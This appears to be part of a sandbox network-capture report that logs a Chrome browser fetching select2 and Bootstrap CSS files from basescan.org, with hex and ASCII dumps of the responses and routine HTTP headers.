                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 22 72 74 6c 22 5d 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 72 65 6e 64 65 72 65 64 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 6d 75 6c 74 69 70 6c 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 32 70 78 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65
                                                                                                                                                                                                                                              Data Ascii: "rtl"] .select2-selection--single .select2-selection__rendered{padding-right:8px;padding-left:20px}.select2-container .select2-selection--multiple{box-sizing:border-box;cursor:pointer;display:block;min-height:32px;user-select:none;-webkit-user-select:none
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 7d 2e 73 65 6c 65 63 74 32 2d 73 65 61 72 63 68 2d 2d 64 72 6f 70 64 6f 77 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 7d 2e 73 65 6c 65 63 74 32 2d 73 65 61 72 63 68 2d 2d 64 72 6f 70 64 6f 77 6e 20 2e 73 65 6c 65 63 74 32 2d 73 65 61 72 63 68 5f 5f 66 69 65 6c 64 7b 70 61 64 64 69 6e 67 3a 34 70 78 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 73 65 6c 65 63 74 32 2d 73 65 61 72 63 68 2d 2d 64 72 6f 70 64 6f 77 6e 20 2e 73 65 6c 65 63 74 32 2d 73 65 61 72 63 68 5f
                                                                                                                                                                                                                                              Data Ascii: border-top:none;border-top-left-radius:0;border-top-right-radius:0}.select2-search--dropdown{display:block;padding:4px}.select2-search--dropdown .select2-search__field{padding:4px;width:100%;box-sizing:border-box}.select2-search--dropdown .select2-search_
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 61 72 72 6f 77 7b 68 65 69 67 68 74 3a 32 36 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 70 78 3b 72 69 67 68 74 3a 31 70 78 3b 77 69 64 74 68 3a 32 30 70 78 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 61 72 72 6f 77 20 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 38 38 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 73 74
                                                                                                                                                                                                                                              Data Ascii: lect2-selection--single .select2-selection__arrow{height:26px;position:absolute;top:1px;right:1px;width:20px}.select2-container--default .select2-selection--single .select2-selection__arrow b{border-color:#888 transparent transparent transparent;border-st
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 72 65 6e 64 65 72 65 64 20 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 6d 75 6c 74 69 70 6c 65 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 63 6c 65 61 72 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 70 78 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74
                                                                                                                                                                                                                                              Data Ascii: .select2-selection__rendered li{list-style:none}.select2-container--default .select2-selection--multiple .select2-selection__clear{cursor:pointer;float:right;font-weight:bold;margin-top:5px;margin-right:10px;padding:1px}.select2-container--default .select
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 65 6c 65 63 74 69 6f 6e 2d 2d 6d 75 6c 74 69 70 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 69 73 61 62 6c 65 64 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 63 68 6f 69 63 65 5f 5f 72 65 6d 6f 76 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6f 70 65 6e 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 61 62 6f 76 65 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e
                                                                                                                                                                                                                                              Data Ascii: election--multiple{background-color:#eee;cursor:default}.select2-container--default.select2-container--disabled .select2-selection__choice__remove{display:none}.select2-container--default.select2-container--open.select2-container--above .select2-selection
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e 20 2e 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e 20 2e 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 67 72 6f 75 70 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e 20 2e 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e 20 2e 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e
                                                                                                                                                                                                                                              Data Ascii: t2-results__option{padding-left:1em}.select2-container--default .select2-results__option .select2-results__option .select2-results__group{padding-left:0}.select2-container--default .select2-results__option .select2-results__option .select2-results__option
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 72 3a 23 66 37 66 37 66 37 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 20 23 66 66 66 20 35 30 25 2c 20 23 65 65 65 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 20 23 66 66 66 20 35 30 25 2c 20 23 65 65 65 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 23 66 66 66 20 35 30 25 2c 20 23 65 65 65 20 31 30 30 25 29 3b 62
                                                                                                                                                                                                                                              Data Ascii: r:#f7f7f7;border:1px solid #aaa;border-radius:4px;outline:0;background-image:-webkit-linear-gradient(top, #fff 50%, #eee 100%);background-image:-o-linear-gradient(top, #fff 50%, #eee 100%);background-image:linear-gradient(to bottom, #fff 50%, #eee 100%);b
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 73 74 61 72 74 43 6f 6c 6f 72 73 74 72 3d 27 23 46 46 45 45 45 45 45 45 27 2c 20 65 6e 64 43 6f 6c 6f 72 73 74 72 3d 27 23 46 46 43 43 43 43 43 43 27 2c 20 47 72 61 64 69 65 6e 74 54 79 70 65 3d 30 29 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 63 6c 61 73 73 69 63 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 61 72 72 6f 77 20 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 38 38 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 35 70 78 20 34 70 78 20 30 20 34 70 78 3b 68 65 69 67
                                                                                                                                                                                                                                              Data Ascii: startColorstr='#FFEEEEEE', endColorstr='#FFCCCCCC', GradientType=0)}.select2-container--classic .select2-selection--single .select2-selection__arrow b{border-color:#888 transparent transparent transparent;border-style:solid;border-width:5px 4px 0 4px;heig
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 6f 70 2c 20 23 66 66 66 20 30 25 2c 20 23 65 65 65 20 35 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 23 66 66 66 20 30 25 2c 20 23 65 65 65 20 35 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 73 74 72 3d 27 23 46 46 46 46 46 46 46 46 27 2c 20 65 6e 64 43 6f 6c 6f 72 73 74 72 3d 27 23 46 46 45 45 45 45 45 45 27 2c 20 47 72 61 64 69 65 6e 74 54 79 70 65 3d 30 29 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 63 6c 61 73
                                                                                                                                                                                                                                              Data Ascii: op, #fff 0%, #eee 50%);background-image:linear-gradient(to bottom, #fff 0%, #eee 50%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#FFFFFFFF', endColorstr='#FFEEEEEE', GradientType=0)}.select2-container--clas


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              27192.168.2.549750104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC612OUTGET /assets/css/theme.min.css?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC807INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Thu, 16 Nov 2023 07:37:18 GMT
                                                                                                                                                                                                                                              ETag: W/"0cbdbb95f18da1:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 87380
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VbsueKO%2FoyLuDP4QedWTvC96UNWF8mw6hu%2Fzkz1l33KGOvqZP%2Fl2RHLF6MWOw4rs79ZwXyi%2BKwiZqJi9GOCs1Ha2Jey8X%2B1zW6ioOz5T%2BlFl40ZCjgyvUlEh3cdYuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2bf0c610f5b-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC562INData Raw: 37 63 37 61 0d 0a 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 20 76 35 2e 33 2e 30 2d 61 6c 70 68 61 31 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 32 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 3a 72 6f 6f 74 2c 5b 64 61 74 61 2d 62 73 2d 74 68 65 6d 65 3d 6c 69 67 68 74 5d 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 37 38 34 63
                                                                                                                                                                                                                                              Data Ascii: 7c7a@charset "UTF-8";/*! * Bootstrap v5.3.0-alpha1 (https://getbootstrap.com/) * Copyright 2011-2022 The Bootstrap Authors * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root,[data-bs-theme=light]{--bs-blue:#0784c
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 32 65 36 3b 2d 2d 62 73 2d 67 72 61 79 2d 34 30 30 3a 23 63 65 64 34 64 61 3b 2d 2d 62 73 2d 67 72 61 79 2d 35 30 30 3a 23 61 64 62 35 62 64 3b 2d 2d 62 73 2d 67 72 61 79 2d 36 30 30 3a 23 36 63 37 35 37 64 3b 2d 2d 62 73 2d 67 72 61 79 2d 37 30 30 3a 23 34 39 35 30 35 37 3b 2d 2d 62 73 2d 67 72 61 79 2d 38 30 30 3a 23 33 34 33 61 34 30 3b 2d 2d 62 73 2d 67 72 61 79 2d 39 30 30 3a 23 32 31 32 35 32 39 3b 2d 2d 62 73 2d 70 72 69 6d 61 72 79 3a 23 30 37 38 34 63 33 3b 2d 2d 62 73 2d 73 65 63 6f 6e 64 61 72 79 3a 23 61 64 62 35 62 64 3b 2d 2d 62 73 2d 73 75 63 63 65 73 73 3a 23 30 30 61 31 38 36 3b 2d 2d 62 73 2d 69 6e 66 6f 3a 23 30 37 38 34 63 33 3b 2d 2d 62 73 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 62 73 2d 64 61 6e 67 65 72 3a 23 64 63
                                                                                                                                                                                                                                              Data Ascii: 2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0784c3;--bs-secondary:#adb5bd;--bs-success:#00a186;--bs-info:#0784c3;--bs-warning:#ffc107;--bs-danger:#dc
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 22 53 65 67 6f 65 20 55 49 22 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 53 61 6e 73 22 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 2d 2d 62 73 2d 66 6f 6e 74 2d 6d 6f 6e 6f 73 70 61 63 65 3a 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 6d 6f 6e
                                                                                                                                                                                                                                              Data Ascii: -apple-system,"Segoe UI","Helvetica Neue","Noto Sans","Liberation Sans",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",mon
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 78 2d 73 68 61 64 6f 77 3a 30 20 30 2e 35 72 65 6d 20 31 72 65 6d 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 35 29 3b 2d 2d 62 73 2d 62 6f 78 2d 73 68 61 64 6f 77 2d 73 6d 3a 30 20 30 2e 31 32 35 72 65 6d 20 30 2e 32 35 72 65 6d 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 30 37 35 29 3b 2d 2d 62 73 2d 62 6f 78 2d 73 68 61 64 6f 77 2d 6c 67 3a 30 20 31 72 65 6d 20 33 72 65 6d 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 37 35 29 3b 2d 2d 62 73 2d 62 6f 78 2d 73 68 61 64 6f 77 2d 69 6e 73 65 74 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 30 37 35 29 3b 2d 2d 62 73 2d 65 6d 70 68 61 73 69 73 2d 63 6f 6c 6f 72 3a 23 30 30 30 3b 2d 2d 62 73 2d 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c
                                                                                                                                                                                                                                              Data Ascii: x-shadow:0 0.5rem 1rem rgba(0, 0, 0, 0.15);--bs-box-shadow-sm:0 0.125rem 0.25rem rgba(0, 0, 0, 0.075);--bs-box-shadow-lg:0 1rem 3rem rgba(0, 0, 0, 0.175);--bs-box-shadow-inset:inset 0 1px 2px rgba(0, 0, 0, 0.075);--bs-emphasis-color:#000;--bs-form-control
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 6c 65 3a 23 32 63 30 62 30 65 3b 2d 2d 62 73 2d 6c 69 67 68 74 2d 62 67 2d 73 75 62 74 6c 65 3a 23 33 34 33 61 34 30 3b 2d 2d 62 73 2d 64 61 72 6b 2d 62 67 2d 73 75 62 74 6c 65 3a 23 31 61 31 64 32 30 3b 2d 2d 62 73 2d 70 72 69 6d 61 72 79 2d 62 6f 72 64 65 72 2d 73 75 62 74 6c 65 3a 23 30 34 34 66 37 35 3b 2d 2d 62 73 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6f 72 64 65 72 2d 73 75 62 74 6c 65 3a 23 34 39 35 30 35 37 3b 2d 2d 62 73 2d 73 75 63 63 65 73 73 2d 62 6f 72 64 65 72 2d 73 75 62 74 6c 65 3a 23 30 30 37 39 36 34 3b 2d 2d 62 73 2d 69 6e 66 6f 2d 62 6f 72 64 65 72 2d 73 75 62 74 6c 65 3a 23 30 35 35 31 36 30 3b 2d 2d 62 73 2d 77 61 72 6e 69 6e 67 2d 62 6f 72 64 65 72 2d 73 75 62 74 6c 65 3a 23 36 36 34 64 30 33 3b 2d 2d 62 73 2d 64 61 6e 67 65 72 2d 62
                                                                                                                                                                                                                                              Data Ascii: le:#2c0b0e;--bs-light-bg-subtle:#343a40;--bs-dark-bg-subtle:#1a1d20;--bs-primary-border-subtle:#044f75;--bs-secondary-border-subtle:#495057;--bs-success-border-subtle:#007964;--bs-info-border-subtle:#055160;--bs-warning-border-subtle:#664d03;--bs-danger-b
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 65 3a 32 2e 33 34 33 37 35 72 65 6d 7d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 31 32 35 72 65 6d 20 2b 20 2e 37 35 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 37 35 72 65 6d 7d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 32 38 39 30 36 32 35 72 65 6d 20 2b 20 2e 34 36 38 37 35 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 34 30 36 32 35 72 65 6d 7d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 32 36 35 36 32 35 72 65 6d 20 2b 20 2e 31 38 37 35 76 77 29
                                                                                                                                                                                                                                              Data Ascii: e:2.34375rem}}.h2,h2{font-size:calc(1.3125rem + .75vw)}@media (min-width:1200px){.h2,h2{font-size:1.875rem}}.h3,h3{font-size:calc(1.2890625rem + .46875vw)}@media (min-width:1200px){.h3,h3{font-size:1.640625rem}}.h4,h4{font-size:calc(1.265625rem + .1875vw)
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 6d 7d 70 72 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 63 6f 64 65 2d 63 6f 6c 6f 72 29 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 31 38 37 35 72 65 6d 20 2e 33 37 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 62 6f 64 79 2d 62 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 62 6f 64 79 2d 63 6f
                                                                                                                                                                                                                                              Data Ascii: m}pre code{font-size:inherit;color:inherit;word-break:normal}code{font-size:.875em;color:var(--bs-code-color);word-wrap:break-word}a>code{color:inherit}kbd{padding:.1875rem .375rem;font-size:.875em;color:var(--bs-body-bg);background-color:var(--bs-body-co
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 61 72 65 61 7b 72 65 73 69 7a 65 3a 76 65 72 74 69 63 61 6c 7d 66 69 65 6c 64 73 65 74 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 6c 65 67 65 6e 64 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 32 37 35 72 65 6d 20 2b 20 2e 33 76 77 29 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 6c 65 67 65 6e 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 7d 6c 65 67 65 6e 64 2b 2a 7b 63 6c 65 61 72 3a 6c 65 66 74 7d 3a 3a 2d
                                                                                                                                                                                                                                              Data Ascii: area{resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{float:left;width:100%;padding:0;margin-bottom:.5rem;font-size:calc(1.275rem + .3vw);line-height:inherit}@media (min-width:1200px){legend{font-size:1.5rem}}legend+*{clear:left}::-
